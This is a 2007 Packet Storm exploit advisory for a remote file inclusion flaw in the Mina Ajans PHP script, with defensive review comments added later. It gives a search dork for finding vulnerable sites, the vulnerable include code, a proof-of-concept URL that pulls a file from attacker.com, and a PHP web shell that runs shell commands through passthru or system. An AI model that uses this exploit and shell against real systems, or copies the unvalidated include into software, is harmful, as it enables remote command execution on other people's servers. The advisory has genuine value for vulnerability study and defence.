mina-rfi.txt

2007-02-06T00:00:00
ID PACKETSTORM:54210
Type packetstorm
Reporter Gokhan
Modified 2007-02-06T00:00:00

Description

                                        
                                            `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
$  
$  
$ Title : Mina Ajans Script Remote File Inclusion Vuln.  
$ Author : CanberX , BLaCKWHITE  
$ Free : NOT :(  
$ Disb : www.minaajans.com.tr  
$ G. Dork : "Tasarim ve program: Mina Ajans."  
$  
$ Vuln Code :  
""""""""""""""""""""""""""""""""""""""""""""  
<?  
// Vulnerable pattern as quoted by the advisory.
// The statement below only reads $_GET["syf"] and discards the value; it does not assign $syf.
$_GET["syf"];  
// NOTE(review): $syf is never assigned in this excerpt, so it presumably reaches scope through
// register_globals copying the "syf" request parameter - confirm against the full script.
// The request-controlled value is used as an include path with no validation. The PoC on this
// page passes an http:// URL, which PHP only fetches when allow_url_fopen (and, from PHP 5.2,
// allow_url_include) is enabled; local paths remain includable either way.
// Fix direction: never pass request data to include; map the parameter to a fixed allowlist
// of local page files and reject anything else.
include_once $syf;  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ PoC : http://target.com/[vuln_file].php?syf=http://attacker.com/cmd.txt?cmd=id  
$  
$ CMD Ex. :  
""""""""""""""""""""""""""""""""""""""""""""  
<?php  
// Example payload from the advisory: the remote text file referenced by the PoC URL's "syf" value.
// Defender view: request logs with a URL scheme inside the "syf" parameter, or outbound HTTP
// fetches made by the web server itself, are the signals to look for.
// Suppresses PHP error output for the rest of the request.
error_reporting(0);  
// Takes the "cmd" query parameter unvalidated.
$cmd=$_GET["cmd"];  
// Uses that same value as a file path to include.
include $cmd;  
// Passes the value to the system shell and streams the raw output into the response.
// Listing only passthru in disable_functions is not a complete mitigation (the author's own
// comment below names an alternative); the root fix is removing the unvalidated include.
passthru($cmd); // if passthru disabled then use @system("string");  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ CanberX , BLaCKWHITE  
$  
$ gr33tz: BLaSTeR  
$  
$ web: canberx.uni.cc & blackwhite.tc & bl4ster.net  
$  
$ Don't be n00b!..  
$  
$  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
`